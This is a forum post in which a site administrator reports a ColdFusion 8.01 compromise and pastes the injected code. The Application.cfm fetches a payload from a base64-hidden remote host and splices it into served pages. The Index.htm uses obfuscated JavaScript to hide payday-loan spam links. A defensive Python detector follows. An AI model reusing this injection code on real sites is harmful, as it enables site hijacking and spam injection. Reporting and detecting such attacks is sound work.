39 Replies. Latest reply on Sep 22, 2013 3:03 PM by Cenn Raven

    CF8.01 hacked.  Need info on patches

    Jjboswell Level 1

      Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply or if I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

       

      Here's the hack:

       

      1. Application.cfm

      <cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

      <cfset mmy = cfhttp.FileContent><cfoutput>

      #mmy#

      </cfoutput>

      </cfsavecontent>

      <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

      <cfset cfs = cfhttp.FileContent>

      <cfif (FindNoCase("</div>",paga) GT 0)>

      <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

      <cfelseif (FindNoCase("</table>",paga) GT 0)>

      <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

      <cfelseif (FindNoCase("</a>",paga) GT 0)>

      <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

      <cfelse>

      <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

      </cfif>

      <cfoutput>

      #paga#

      </cfoutput>

      <cfabort>

      </cfif>

      <cffunction name="hSWaawe"> 

      <cfargument name="HxzcGlk">

      <cfset Ypg = ToString(ToBinary(HxzcGlk))>

      <cfreturn Ypg>

      </cffunction>

       

       

      2. Index.htm

       

       

      <html>

        <head>

          <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

        </head>

        <body>

          <br>

          <br>

          <br>

          <br>

          <center>

            <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

      {

      var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

      t=z='';

      for(v=0;v<m.length;){t+=m.charAt(v++);

      if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

      t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

      </script>

       

       

       

      <p class="zdroq">

      Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

          </center>

        </body>

      </html>

       

      Thanks in advance.

       

      --Jeremy
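
For triaging other sites on the same server, three traits visible in the Application.cfm listing above can be checked mechanically: a CFHTTP URL built from a base64 literal, a self-request tagged with a marker user agent, and a replace() that splices text after a closing HTML tag. This is an added example, not part of the original post; the function names, rule names and the sample (with the hypothetical host payload.example) are constructed for illustration.

```python
import base64
import re

# Heuristics drawn from the injected Application.cfm shown in the post.
CFHTTP_TAG = re.compile(r"<cfhttp\b[^>]*>", re.I)
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
USER_AGENT = re.compile(r"""userAgent\s*=\s*["']([^"']+)["']""", re.I)
SELF_URL = re.compile(r"#SERVER_NAME##SCRIPT_NAME#", re.I)
TAG_SPLICE = re.compile(r'replace\(\s*\w+\s*,\s*"(</(?:div|table|a|body)>)"', re.I)

def decode_url_literal(literal):
    """Return the decoded text if literal is base64 for an http(s) URL."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if re.match(r"https?://", text, re.I) else None

def scan_cfml(source):
    """Return (rule, detail) pairs for each suspicious trait in the source."""
    findings = []
    for tag in CFHTTP_TAG.findall(source):
        for literal in B64_LITERAL.findall(tag):
            url = decode_url_literal(literal)
            if url:
                findings.append(("encoded-remote-fetch", url))
        agent = USER_AGENT.search(tag)
        if agent and SELF_URL.search(tag):
            findings.append(("self-request-marker-agent", agent.group(1)))
    for closing_tag in TAG_SPLICE.findall(source):
        findings.append(("output-splice", closing_tag))
    return findings

# Constructed sample: same structure as the post's listing, hypothetical host.
ENC = base64.b64encode(b"http://payload.example/inject.txt").decode()
SAMPLE = f'''<cfif (FindNoCase("Marker",http_user_agent) EQ 0)>
<cfsavecontent variable="page">
<CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Marker">
<cfoutput>#cfhttp.FileContent#</cfoutput></cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#dec('{ENC}')#">
<cfset page = replace(page, "</div>", "</div>#cfhttp.FileContent#", "one")>
<cfoutput>#page#</cfoutput><cfabort></cfif>'''

if __name__ == "__main__":
    for rule, detail in scan_cfml(SAMPLE):
        print(f"{rule}: {detail}")
```

Any hit in a file you did not author is worth a diff against a known-good copy of that file.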
